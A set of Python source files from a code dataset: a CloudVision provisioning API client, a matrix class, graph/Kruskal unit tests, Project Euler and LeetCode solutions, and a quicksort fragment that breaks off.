[]\n keep_keys = []\n for configlet in configlets:\n key = configlet['key']\n if next((ent for ent in del_configlets if ent['key'] == key),\n None) is None:\n keep_names.append(configlet['name'])\n keep_keys.append(key)\n\n # Remove the names and keys of the configlets to keep and build a\n # list of the configlets to remove.\n del_names = []\n del_keys = []\n for entry in del_configlets:\n del_names.append(entry['name'])\n del_keys.append(entry['key'])\n\n info = '%s Configlet Remove: from Device %s' % (app_name, dev['fqdn'])\n info_preview = 'Configlet Remove: from Device' + dev['fqdn']\n data = {'data': [{'info': info,\n 'infoPreview': info_preview,\n 'note': '',\n 'action': 'associate',\n 'nodeType': 'configlet',\n 'nodeId': '',\n 'configletList': keep_keys,\n 'configletNamesList': keep_names,\n 'ignoreConfigletNamesList': del_names,\n 'ignoreConfigletList': del_keys,\n 'configletBuilderList': [],\n 'configletBuilderNamesList': [],\n 'ignoreConfigletBuilderList': [],\n 'ignoreConfigletBuilderNamesList': [],\n 'toId': dev['systemMacAddress'],\n 'toIdType': 'netelement',\n 'fromId': '',\n 'nodeName': '',\n 'fromName': '',\n 'toName': dev['fqdn'],\n 'nodeIpAddress': dev['ipAddress'],\n 'nodeTargetIpAddress': dev['ipAddress'],\n 'childTasks': [],\n 'parentTask': ''}]}\n self.log.debug('remove_configlets_from_device: saveTopology data:\\n%s'\n % data['data'])\n self._add_temp_action(data)\n if create_task:\n return self._save_topology_v2([])\n\n # pylint: disable=too-many-arguments\n def _container_op(self, container_name, container_key, parent_name,\n parent_key, operation):\n ''' Perform the operation on the container.\n\n Args:\n container_name (str): Container name\n container_key (str): Container key, can be empty for add.\n parent_name (str): Parent container name\n parent_key (str): Parent container key\n operation (str): Container operation 'add' or 'delete'.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n '''\n msg = ('%s container %s under container %s' %\n (operation, container_name, parent_name))\n data = {'data': [{'info': msg,\n 'infoPreview': msg,\n 'action': operation,\n 'nodeType': 'container',\n 'nodeId': container_key,\n 'toId': '',\n 'fromId': '',\n 'nodeName': container_name,\n 'fromName': '',\n 'toName': '',\n 'childTasks': [],\n 'parentTask': '',\n 'toIdType': 'container'}]}\n if operation is 'add':\n data['data'][0]['toId'] = parent_key\n data['data'][0]['toName'] = parent_name\n elif operation is 'delete':\n data['data'][0]['fromId'] = parent_key\n data['data'][0]['fromName'] = parent_name\n\n # Perform the container operation\n self._add_temp_action(data)\n return self._save_topology_v2([])\n\n def add_container(self, container_name, parent_name, parent_key):\n ''' Add the container to the specified parent.\n\n Args:\n container_name (str): Container name\n parent_name (str): Parent container name\n parent_key (str): Parent container key\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n '''\n self.log.debug('add_container: container: %s parent: %s parent_key: %s'\n % (container_name, parent_name, parent_key))\n return self._container_op(container_name, 'new_container', parent_name,\n parent_key, 'add')\n\n def delete_container(self, container_name, container_key, parent_name,\n parent_key):\n ''' Add the container to the specified parent.\n\n Args:\n container_name (str): Container name\n container_key (str): Container key\n parent_name (str): Parent container name\n parent_key (str): Parent container key\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n '''\n self.log.debug('delete_container: container: %s container_key: %s '\n 'parent: %s parent_key: %s' %\n (container_name, container_key, parent_name,\n parent_key))\n return self._container_op(container_name, container_key, parent_name,\n parent_key, 'delete')\n\n def get_parent_container_for_device(self, device_mac):\n ''' Add the container to the specified parent.\n\n Args:\n device_mac (str): Device mac address\n\n Returns:\n response (dict): A dict that contains the parent container info\n '''\n self.log.debug('get_parent_container_for_device: called for %s'\n % device_mac)\n data = self.clnt.get('/provisioning/searchTopology.do?'\n 'queryParam=%s&startIndex=0&endIndex=0'\n % device_mac, timeout=self.request_timeout)\n if data['total'] > 0:\n cont_name = data['netElementContainerList'][0]['containerName']\n return self.get_container_by_name(cont_name)\n return None\n\n def move_device_to_container(self, app_name, device, container,\n create_task=True):\n ''' Add the container to the specified parent.\n\n Args:\n app_name (str): String to specify info/signifier of calling app\n device (dict): Device info\n container (dict): Container info\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': []}}\n '''\n info = '%s moving device %s to container %s' % (app_name,\n device['fqdn'],\n container['name'])\n self.log.debug('Attempting to move device %s to container %s'\n % (device['fqdn'], container['name']))\n if 'parentContainerId' in device:\n from_id = device['parentContainerId']\n else:\n parent_cont = self.get_parent_container_for_device(device['key'])\n from_id = parent_cont['key']\n data = {'data': [{'info': info,\n 'infoPreview': info,\n 'action': 'update',\n 'nodeType': 'netelement',\n 'nodeId': device['key'],\n 'toId': container['key'],\n 'fromId': from_id,\n 'nodeName': device['fqdn'],\n 'toName': container['name'],\n 'toIdType': 'container',\n 'childTasks': [],\n 'parentTask': ''}]}\n try:\n self._add_temp_action(data)\n # pylint: disable=invalid-name\n except CvpApiError as e:\n if 'Data already exists' in str(e):\n self.log.debug('Device %s already in container %s'\n % (device['fqdn'], container))\n if create_task:\n return self._save_topology_v2([])\n\n def search_topology(self, query, start=0, end=0):\n ''' Search the topology for items matching the query parameter.\n\n Args:\n query (str): Query parameter which is the name of the container\n or device.\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n response (dict): A dict that contains the container and\n netelement lists.\n '''\n self.log.debug('search_topology: query: %s start: %d end: %d' %\n (query, start, end))\n data = self.clnt.get('/provisioning/searchTopology.do?queryParam=%s&'\n 'startIndex=%d&endIndex=%d'\n % (urllib.quote_plus(query), start, end),\n timeout=self.request_timeout)\n return data\n\n def check_compliance(self, node_key, node_type):\n ''' Check that a device is in compliance, that is the configlets\n applied to the device match the devices running configuration.\n\n Args:\n node_key (str): The device key.\n node_type (str): The device type.\n\n Returns:\n response (dict): A dict that contains the results of the\n compliance check.\n '''\n self.log.debug('check_compliance: node_key: %s node_type: %s' %\n (node_key, node_type))\n data = {'nodeId': node_key, 'nodeType': node_type}\n return self.clnt.post('/provisioning/checkCompliance.do', data=data,\n timeout=self.request_timeout)\n\n def get_images(self, start=0, end=0):\n ''' Return a list of all images.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n images (dict): The 'total' key contains the number of images,\n the 'data' key contains a list of images and their info.\n '''\n self.log.debug('Get info about images')\n return self.clnt.get('/image/getImages.do?queryparam=&startIndex=%d&'\n 'endIndex=%d' % (start, end),\n timeout=self.request_timeout)\n\n def get_image_bundles(self, start=0, end=0):\n ''' Return a list of all image bundles.\n\n Args:\n start (int): Start index for the pagination. Default is 0.\n end (int): End index for the pagination. If end index is 0\n then all the records will be returned. Default is 0.\n\n Returns:\n image bundles (dict): The 'total' key contains the number of\n image bundles, the 'data' key contains a list of image\n bundles and their info.\n '''\n self.log.debug('Get image bundles that can be applied to devices or'\n ' containers')\n return self.clnt.get('/image/getImageBundles.do?queryparam=&'\n 'startIndex=%d&endIndex=%d' % (start, end),\n timeout=self.request_timeout)\n\n def get_image_bundle_by_name(self, name):\n ''' Return a dict of info about an image bundle.\n\n Args:\n name (str): Name of image bundle to return info about.\n\n Returns:\n image bundle (dict): Dict of info specific to the image bundle\n requested or None if the name requested doesn't exist.\n '''\n self.log.debug('Attempt to get image bundle %s' % name)\n try:\n image = self.clnt.get('/image/getImageBundleByName.do?name=%s'\n % urllib.quote_plus(name),\n timeout=self.request_timeout)\n except CvpApiError as error:\n # Catch an invalid task_id error and return None\n if 'Entity does not exist' in str(error):\n self.log.debug('Bundle with name %s does not exist' % name)\n return None\n raise error\n return image\n\n def apply_image_to_device(self, image, device, create_task=True):\n ''' Apply an image bundle to a device\n\n Args:\n image (dict): The image info.\n device (dict): Info about device to apply image to.\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any). Image updates will not run until\n task or tasks are executed.\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.apply_image_to_element(image, device, device['fqdn'],\n 'netelement', create_task)\n\n def apply_image_to_container(self, image, container, create_task=True):\n ''' Apply an image bundle to a container\n\n Args:\n image (dict): The image info.\n container (dict): Info about container to apply image to.\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any). Image updates will not run until\n task or tasks are executed.\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.apply_image_to_element(image, container, container['name'],\n 'container', create_task)\n\n def apply_image_to_element(self, image, element, name, id_type,\n create_task=True):\n ''' Apply an image bundle to a device or container.\n\n Args:\n image (dict): The image info.\n element (dict): Info about element to apply image to. Dict\n can contain device info or container info.\n name (str): Name of element image is being applied to.\n id_type (str): Id type of element image is being applied to.\n create_task (bool): Determines whether or not to execute a save\n and create the tasks (if any)\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any). Image updates will not run until\n task or tasks are executed.\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n self.log.debug('Attempt to apply %s to %s %s' % (image['name'],\n id_type, name))\n info = 'Apply image: %s to %s %s' % (image['name'], id_type, name)\n data = {'data': [{'info': info,\n 'infoPreview': info,\n 'note': '',\n 'action': 'associate',\n 'nodeType': 'imagebundle',\n 'nodeId': image['id'],\n 'toId': element['key'],\n 'toIdType': id_type,\n 'fromId': '',\n 'nodeName': image['name'],\n 'fromName': '',\n 'toName': name,\n 'childTasks': [],\n 'parentTask': ''}]}\n self._add_temp_action(data)\n if create_task:\n return self._save_topology_v2([])\n\n def remove_image_from_device(self, image, device):\n ''' Remove the image bundle from the specified device.\n\n Args:\n image (dict): The image info.\n device (dict): The device info.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.remove_image_from_element(image, device, device['fqdn'],\n 'netelement')\n\n def remove_image_from_container(self, image, container):\n ''' Remove the image bundle from the specified container.\n\n Args:\n image (dict): The image info.\n container (dict): The container info.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n return self.remove_image_from_element(image, container,\n container['name'], 'container')\n\n def remove_image_from_element(self, image, element, name, id_type):\n ''' Remove the image bundle from the specified container.\n\n Args:\n image (dict): The image info.\n element (dict): The container info.\n name (): name.\n id_type (): type.\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n self.log.debug('Attempt to remove %s from %s' % (image['name'], name))\n info = 'Remove image: %s from %s' % (image['name'], name)\n data = {'data': [{'info': info,\n 'infoPreview': info,\n 'note': '',\n 'action': 'associate',\n 'nodeType': 'imagebundle',\n 'nodeId': '',\n 'toId': element['key'],\n 'toIdType': id_type,\n 'fromId': '',\n 'nodeName': '',\n 'fromName': '',\n 'toName': name,\n 'ignoreNodeId': image['id'],\n 'ignoreNodeName': image['name'],\n 'childTasks': [],\n 'parentTask': ''}]}\n self._add_temp_action(data)\n return self._save_topology_v2([])\n\n def deploy_device(self, device, container, configlets=None, image=None, create_task=True):\n ''' Move a device from the undefined container to a target container.\n Optionally apply device-specific configlets and an image.\n\n Args:\n device (dict): unique key for the device\n container (str): name of container to move device to\n configlets (list): list of dicts with configlet key/name pairs\n image (str): name of image to apply to device\n\n Returns:\n response (dict): A dict that contains a status and a list of\n task ids created (if any).\n\n Ex: {u'data': {u'status': u'success', u'taskIds': [u'32']}}\n '''\n info = 'Deploy device %s to container %s' % (device['fqdn'], container)\n self.log.debug(info)\n container_info = self.get_container_by_name(container)\n # Add action for moving device to specified container\n self.move_device_to_container('Deploy device', device, container_info,\n create_task=False)\n # Get proposed configlets device will inherit from container it is\n # being moved to.\n prop_conf = self.clnt.get('/provisioning/getTempConfigsByNetElementId.'\n 'do?netElementId=%s' % device['key'])\n new_configlets = prop_conf['proposedConfiglets']\n if configlets:\n new_configlets.extend(configlets)\n self.apply_configlets_to_device('deploy_device', device,\n new_configlets, create_task=False)\n # Apply image to the device\n if image:\n image_info = self.get_image_bundle_by_name(image)\n self.apply_image_to_device(image_info, device, create_task=False)\n if create_task:\n return self._save_topology_v2([])\n","sub_path":"cvprac/cvp_api.py","file_name":"cvp_api.py","file_ext":"py","file_size_in_byte":49511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"483849515","text":"\"\"\"\nMatrix implementation and its arithmetics\n\"\"\"\n\nclass Matrix:\n \"\"\"\n >>> m1 = Matrix(2, 2, [1,2,3,4])\n >>> m2 = Matrix(2, 2, [4,3,2,1])\n >>> m1.product(m2)\n >>> m1.data\n [[8, 5], [20, 13]]\n \"\"\"\n\n def __init__(self, m, n, array):\n self.m = m\n self.n = n\n self.data = [[0]*n for i in range(m)]\n self._build(array)\n\n def _build(self, array):\n k = 0\n for i in range(self.m):\n for j in range(self.n):\n self.data[i][j] = array[k]\n k += 1\n\n def product(self, m2):\n data = [[0]*m2.n for i in range(self.m)]\n for i in range(self.m):\n for j in range(m2.n):\n cij = 0\n for k in range(self.n):\n cij += self.data[i][k] * m2.data[k][j]\n data[i][j] = cij\n self.data = data\n","sub_path":"special_topics/math/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"445441782","text":"import unittest\nfrom grafo_adj_nao_dir import Grafo\n\nclass TestGrafo(unittest.TestCase):\n\n def setUp(self):\n # Grafo da Paraíba\n self.g_p = Grafo(['J', 'C', 'E', 'P', 'M', 'T', 'Z'])\n #{'a1':'J-C', 'a2':'C-E', 'a3':'C-E', 'a4':'C-P', 'a5':'C-P', 'a6':'C-M', 'a7':'C-T', 'a8':'M-T', 'a9':'T-Z'}\n self.g_p.adicionaAresta('J-C', 3)\n self.g_p.adicionaAresta('C-E', 3)\n self.g_p.adicionaAresta('C-E', 2)\n self.g_p.adicionaAresta('C-P', 1)\n self.g_p.adicionaAresta('C-P', 7)\n self.g_p.adicionaAresta('C-M', 5)\n self.g_p.adicionaAresta('C-T', 4)\n self.g_p.adicionaAresta('M-T', 3)\n self.g_p.adicionaAresta('T-Z', 4)\n\n\n # Grafo da Paraíba sem arestas paralelas\n self.g_p_sem_paralelas = Grafo(['J', 'C', 'E', 'P', 'M', 'T', 'Z'])\n self.g_p_sem_paralelas.adicionaAresta('J-C', 3)\n self.g_p_sem_paralelas.adicionaAresta('C-E', 6)\n self.g_p_sem_paralelas.adicionaAresta('C-P', 7)\n self.g_p_sem_paralelas.adicionaAresta('C-M', 4)\n self.g_p_sem_paralelas.adicionaAresta('C-T', 4)\n self.g_p_sem_paralelas.adicionaAresta('M-T',8)\n self.g_p_sem_paralelas.adicionaAresta('T-Z', 9)\n\n # Grafos completos\n #self.g_c = Grafo(['J', 'C', 'E', 'P'], {'a1':'J-C', 'a3':'J-E', 'a4':'J-P', 'a6':'C-E', 'a7':'C-P', 'a8':'E-P'})\n self.g_c = Grafo(['J', 'C', 'E', 'P'])\n self.g_c.adicionaAresta('J-C', 4)\n self.g_c.adicionaAresta('J-E', 2)\n self.g_c.adicionaAresta('J-P', 1)\n self.g_c.adicionaAresta('C-E', 5)\n self.g_c.adicionaAresta('C-P', 8)\n self.g_c.adicionaAresta('E-P', 3)\n\n\n g = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']:\n g.adicionaVertice(i)\n g.adicionaAresta(\"a-g\", 4)\n g.adicionaAresta(\"a-b\", 9)\n g.adicionaAresta(\"b-c\", 6)\n g.adicionaAresta(\"b-h\", 7)\n g.adicionaAresta(\"b-g\", 10)\n g.adicionaAresta(\"c-d\", 8)\n g.adicionaAresta(\"c-f\", 8)\n g.adicionaAresta(\"d-e\", 14)\n g.adicionaAresta(\"c-e\", 12)\n g.adicionaAresta(\"e-f\", 2)\n g.adicionaAresta(\"f-h\", 2)\n g.adicionaAresta(\"f-g\", 1)\n\n\n g2 = Grafo([], {})\n\n g2.adicionaVertice('a')\n g2.adicionaVertice('b')\n g2.adicionaVertice('c')\n g2.adicionaVertice('d')\n g2.adicionaVertice('e')\n g2.adicionaVertice('f')\n\n g2.adicionaAresta(\"a-b\", 9)\n g2.adicionaAresta(\"b-c\", 6)\n\n g2.adicionaAresta(\"c-d\", 8)\n g2.adicionaAresta(\"c-f\", 8)\n g2.adicionaAresta(\"d-e\", 14)\n g2.adicionaAresta(\"c-e\", 12)\n g2.adicionaAresta(\"e-f\", 2)\n\n g3 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n g3.adicionaVertice(i)\n g3.adicionaAresta(\"a-g\", 5)\n g3.adicionaAresta(\"a-b\", 19)\n g3.adicionaAresta(\"b-c\", 16)\n g3.adicionaAresta(\"b-g\", 13)\n g3.adicionaAresta(\"c-d\", 19)\n g3.adicionaAresta(\"c-f\", 1)\n g3.adicionaAresta(\"d-e\", 21)\n g3.adicionaAresta(\"c-e\", 30)\n g3.adicionaAresta(\"e-f\", 15)\n g3.adicionaAresta(\"f-g\", 3)\n\n g4 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm']:\n g4.adicionaVertice(i)\n g4.adicionaAresta(\"a-g\", 5)\n g4.adicionaAresta(\"a-b\", 19)\n g4.adicionaAresta(\"b-c\", 16)\n g4.adicionaAresta(\"b-g\", 13)\n g4.adicionaAresta(\"c-d\", 19)\n g4.adicionaAresta(\"c-f\", 1)\n g4.adicionaAresta(\"d-e\", 21)\n g4.adicionaAresta(\"c-e\", 30)\n g4.adicionaAresta(\"e-f\", 15)\n g4.adicionaAresta(\"f-g\", 3)\n g4.adicionaAresta(\"g-m\", 5)\n g4.adicionaAresta(\"i-k\", 1)\n g4.adicionaAresta(\"a-m\", 14)\n g4.adicionaAresta(\"j-l\", 9)\n g4.adicionaAresta(\"i-m\", 8)\n g4.adicionaAresta(\"f-i\", 11)\n g4.adicionaAresta(\"f-h\", 10)\n g4.adicionaAresta(\"c-e\", 13)\n g4.adicionaAresta(\"e-j\", 20)\n g4.adicionaAresta(\"f-k\", 19)\n\n g5 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']:\n g5.adicionaVertice(i)\n g5.adicionaAresta(\"a-g\", 4)\n g5.adicionaAresta(\"a-b\", 9)\n g5.adicionaAresta(\"b-c\", 6)\n g5.adicionaAresta(\"b-h\", 7)\n g5.adicionaAresta(\"b-g\", 10)\n g5.adicionaAresta(\"c-d\", 8)\n g5.adicionaAresta(\"c-f\", 8)\n g5.adicionaAresta(\"d-e\", 14)\n g5.adicionaAresta(\"c-e\", 12)\n g5.adicionaAresta(\"e-f\", 2)\n g5.adicionaAresta(\"f-h\", 2)\n g5.adicionaAresta(\"f-g\", 1)\n\n g6 = Grafo([], {})\n\n g6.adicionaVertice('a')\n g6.adicionaVertice('b')\n g6.adicionaVertice('c')\n g6.adicionaVertice('d')\n g6.adicionaVertice('e')\n g6.adicionaVertice('f')\n\n g6.adicionaAresta(\"a-b\", 9)\n g6.adicionaAresta(\"b-c\", 6)\n\n g6.adicionaAresta(\"c-d\", 8)\n g6.adicionaAresta(\"c-f\", 8)\n g6.adicionaAresta(\"d-e\", 14)\n g6.adicionaAresta(\"c-e\", 12)\n g6.adicionaAresta(\"e-f\", 2)\n\n g7 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n g7.adicionaVertice(i)\n g7.adicionaAresta(\"a-c\", 50)\n g7.adicionaAresta(\"a-d\", 49)\n g7.adicionaAresta(\"b-f\", 55)\n g7.adicionaAresta(\"b-g\", 60)\n g7.adicionaAresta(\"c-d\", 45)\n g7.adicionaAresta(\"c-g\", 52)\n g7.adicionaAresta(\"d-f\", 44)\n g7.adicionaAresta(\"c-g\", 56)\n g7.adicionaAresta(\"e-f\", 10)\n\n\n g8 = Grafo([], {})\n for i in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n g8.adicionaVertice(i)\n g8.adicionaAresta(\"a-b\", 5)\n g8.adicionaAresta(\"a-e\", 12)\n g8.adicionaAresta(\"b-g\", 4)\n g8.adicionaAresta(\"b-f\", 9)\n g8.adicionaAresta(\"c-d\", 10)\n g8.adicionaAresta(\"c-f\", 7)\n g8.adicionaAresta(\"d-f\", 8)\n g8.adicionaAresta(\"c-e\", 10)\n g8.adicionaAresta(\"e-g\", 2)\n g8.adicionaAresta(\"f-g\", 6)\n\n def test_vertices_nao_adjacentes(self):\n self.assertEqual(self.g_p.vertices_nao_adjacentes(), ['J-J', 'J-E', 'J-P', 'J-M', 'J-T', 'J-Z', 'C-C', 'C-Z', 'E-E', 'E-P', 'E-M', 'E-T', 'E-Z', 'P-P', 'P-M', 'P-T', 'P-Z', 'M-M', 'M-Z', 'T-T', 'Z-Z'])\n\n self.assertEqual(self.g_c.vertices_nao_adjacentes(), ['J-J', 'C-C', 'E-E', 'P-P'])\n\n self.assertEqual(self.g_c3.vertices_nao_adjacentes(), ['J-J'])\n\n def test_ha_laco(self):\n self.assertFalse(self.g_p.ha_laco())\n self.assertFalse(self.g_p_sem_paralelas.ha_laco())\n self.assertTrue(self.g_l1.ha_laco())\n self.assertTrue(self.g_l2.ha_laco())\n self.assertTrue(self.g_l3.ha_laco())\n self.assertTrue(self.g_l4.ha_laco())\n self.assertTrue(self.g_l5.ha_laco())\n\n def test_grau(self):\n # Paraíba\n self.assertEqual(self.g_p.grau('J'), 1)\n self.assertEqual(self.g_p.grau('C'), 7)\n self.assertEqual(self.g_p.grau('E'), 2)\n self.assertEqual(self.g_p.grau('P'), 2)\n self.assertEqual(self.g_p.grau('M'), 2)\n self.assertEqual(self.g_p.grau('T'), 3)\n self.assertEqual(self.g_p.grau('Z'), 1)\n\n # Completos\n self.assertEqual(self.g_c.grau('J'), 3)\n self.assertEqual(self.g_c.grau('C'), 3)\n self.assertEqual(self.g_c.grau('E'), 3)\n self.assertEqual(self.g_c.grau('P'), 3)\n\n # Com laço. Lembrando que cada laço conta uma única vez por vértice para cálculo do grau\n self.assertEqual(self.g_l1.grau('A'), 3)\n self.assertEqual(self.g_l2.grau('B'), 3)\n self.assertEqual(self.g_l4.grau('D'), 1)\n\n def test_arestas_ha_paralelas(self):\n self.assertTrue(self.g_p.ha_paralelas())\n self.assertFalse(self.g_p_sem_paralelas.ha_paralelas())\n self.assertFalse(self.g_c.ha_paralelas())\n self.assertFalse(self.g_c3.ha_paralelas())\n self.assertTrue(self.g_l1.ha_paralelas())\n\n def test_arestas_sobre_vertice(self):\n #{'a1': 'J-C', 'a2': 'C-E', 'a3': 'C-E', 'a4': 'C-P', 'a5': 'C-P', 'a6': 'C-M', 'a7': 'C-T', 'a8': 'M-T',\n # 'a9': 'T-Z'}\n self.assertEqual(set(self.g_p.arestas_sobre_vertice('J')), set(['J-C']))\n self.assertEqual(set(self.g_p.arestas_sobre_vertice('C')), set(['C-J', 'C-E', 'C-E', 'C-P', 'C-P', 'C-M', 'C-T']))\n self.assertEqual(set(self.g_p.arestas_sobre_vertice('M')), set(['M-C', 'M-T']))\n\n def test_eh_completo(self):\n self.assertFalse(self.g_p.eh_completo())\n self.assertFalse((self.g_p_sem_paralelas.eh_completo()))\n self.assertTrue((self.g_c.eh_completo()))\n self.assertTrue((self.g_c.eh_completo()))\n self.assertTrue((self.g_c3.eh_completo()))\n self.assertFalse((self.g_l1.eh_completo()))\n self.assertFalse((self.g_l2.eh_completo()))\n self.assertFalse((self.g_l3.eh_completo()))\n self.assertTrue((self.g_l4.eh_completo()))\n self.assertTrue((self.g_l5.eh_completo()))\n\n def test_kruskal(self):\n self.assertEqual(self.g_p_sem_paralelas.Kruskal(), ['J-C', 'C-M', 'M-T', 'T-Z'])\n self.assertEqual(self.g3.Kruskal(), ['c-f', 'f-g', 'a-g', 'b-g', 'e-f', 'd-e'])\n self.assertEqual(self.g4.Kruskal(), ['c-f', 'i-k', 'f-g', 'a-g', 'g-m', 'j-l', 'b-g', 'e-f', 'd-e'])\n self.assertEqual(self.g5.Kruskal(), ['f-g', 'e-f', 'a-g', 'b-c', 'c-d', 'd-e'])\n self.assertEqual(self.g6.Kruskal(), ['e-f', 'b-c', 'c-d', 'a-b', 'd-e'])\n self.assertEqual(self.g7.Kruskal(), ['e-f', 'd-f', 'c-d', 'a-d', 'b-f'])\n self.assertEqual(self.g8.Kruskal(), ['e-g', 'b-g', 'a-b', 'f-g', 'c-f', 'd-f'])","sub_path":"Graphs/Kruskal/grafo_test.py","file_name":"grafo_test.py","file_ext":"py","file_size_in_byte":9141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102532761","text":"from math import sqrt\n\ndef summation(n):\n\tdictionary = {}\n\tmax_n = n\n\n\n\tdef proper_divisors(n):\n\t\tdictionary[n] = 1\n\t\tfor i in range(int(sqrt(n))):\n\t\t\tif (i + 1) ** 2 == n:\n\t\t\t\tdictionary[n] += i + 1\n\t\t\telif n % (i + 2) == 0:\n\t\t\t\tdictionary[n] += (i + 2) + n//(i + 2)\n\n\tnumbers = []\n\tnegate = []\n\tdef is_amicable(n):\n\t\tnonlocal numbers, negate\n\n\t\tif n not in numbers:\n\t\t\tkey = dictionary[n]\n\t\t\tif key in negate:\n\t\t\t\treturn False\n\t\t\telif n == key or key >= max_n:\n\t\t\t\tnegate += [n]\n\t\t\t\treturn False\n\t\t\telif dictionary[key] == n:\n\t\t\t\tnumbers += [n, key]\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tnegate += [n]\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\tsum_n = 0\n\tfor i in range(max_n):\n\t\tproper_divisors(i)\n\n\tfor i in range(max_n):\n\t\tif is_amicable(i):\n\t\t\tsum_n += i\n\n\treturn sum_n\n\nprint(summation(10000))","sub_path":"resource/code-samples/project-euler/0307P21.py","file_name":"0307P21.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"547182224","text":"__author__ = 'July'\n'''\n# https://github.com/kamyu104/LeetCode/blob/master/Python/paint-house.py\nThere are a row of n houses, each house can be painted with one of the three colors: red, blue or green.\nThe cost of painting each house with a certain color is different. You have to paint all the houses such that no two adjacent houses have the same color.\n\nThe cost of painting each house with a certain color is represented by a n x 3 cost matrix.\nFor example, costs[0][0] is the cost of painting house 0 with color red; costs[1][2] is the cost of painting house 1 with color green, and so on... Find the minimum cost to paint all houses.\n\nNote:\nAll costs are positive integers.\n\nHide Company Tags LinkedIn\n\n'''\n\n# Time: O(n)\n# Space: O(1)\n\nclass Solution(object):\n def minCost(self, costs):\n \"\"\"\n :type costs: List[List[int]]\n :rtype: int\n \"\"\"\n if not costs:\n return 0\n\n min_costs = [costs[0], [0,0,0]]\n n = len(costs)\n for i in xrange(1, n):\n min_costs[i % 2][0] = costs[i][0] + min(min_costs[(i-1) % 2][1], min_costs[(i-1) % 2][2] )\n min_costs[i % 2][1] = costs[i][0] + min(min_costs[(i-1) % 2][0], min_costs[(i-1) % 2][2] )\n min_costs[i % 2][2] = costs[i][0] + min(min_costs[(i-1) % 2][0], min_costs[(i-1) % 2][1] )\n\n return min(min_costs[(n-1)%2])\n\n\n# Time: O(n)\n# Space: O(n)\nclass Solution2(object):\n def minCost(self, costs):\n \"\"\"\n :type costs: List[List[int]]\n :rtype: int\n \"\"\"\n if not costs:\n return 0\n n = len(costs)\n for i in xrange(1, n):\n costs[i][0] += min(costs[i-1][1], costs[i-1][2])\n costs[i][1] += min(costs[i-1][0], costs[i-1][2])\n costs[i][2] += min(costs[i-1][0], costs[i-1][1])\n\n return min(costs[n-1])\n\n#java\njs = '''\npublic class Solution {\n public int minCost(int[][] costs) {\n if (costs == null || costs.length == 0 || costs[0].length != 3) {\n return 0;\n }\n int numOfHouse = costs.length;\n int[][] dp = new int[2][3];\n for (int i = 0; i < numOfHouse; i++) {\n for (int j = 0; j < 3; j++) {\n dp[i % 2][j] = Math.min(dp[(i + 1) % 2][(j + 1) % 3], dp[(i + 1) % 2][(j + 2) % 3]) + costs[i][j];\n }\n }\n return Math.min(Math.min(dp[(numOfHouse + 1) % 2][0], dp[(numOfHouse + 1) % 2][1]), dp[(numOfHouse + 1) % 2][2]);\n }\n}\n'''","sub_path":"z-refer_git/PythonPrac-/cs15211/PaintHouse.py","file_name":"PaintHouse.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596776580","text":"\"\"\" Hoare partition scheme Quick Sort\"\"\"\n\n# partition the array\ndef partition(array, left, right):\n pivot = array[(left+right)/2]; # choose rightmost element for comparison\n\n # swap elements < pivot with current element in a loop\n while left <= right:\n while array[left] < pivot: \n left+=1; # index of left element should be on the right \n while array[right] > pivot: \n right-=1; # index of right element should be on the left \n\n # swap elements and move left and right indices\n if left <= right:\n array[left], array[right] = array[right], array[left]\n left+=1\n right-=1\n return left;\n\n# divide array into halves\ndef quick_sort(array, left, right):\n if left < right:\n pivot = partition(array, left, right)\n quick_sort(array, 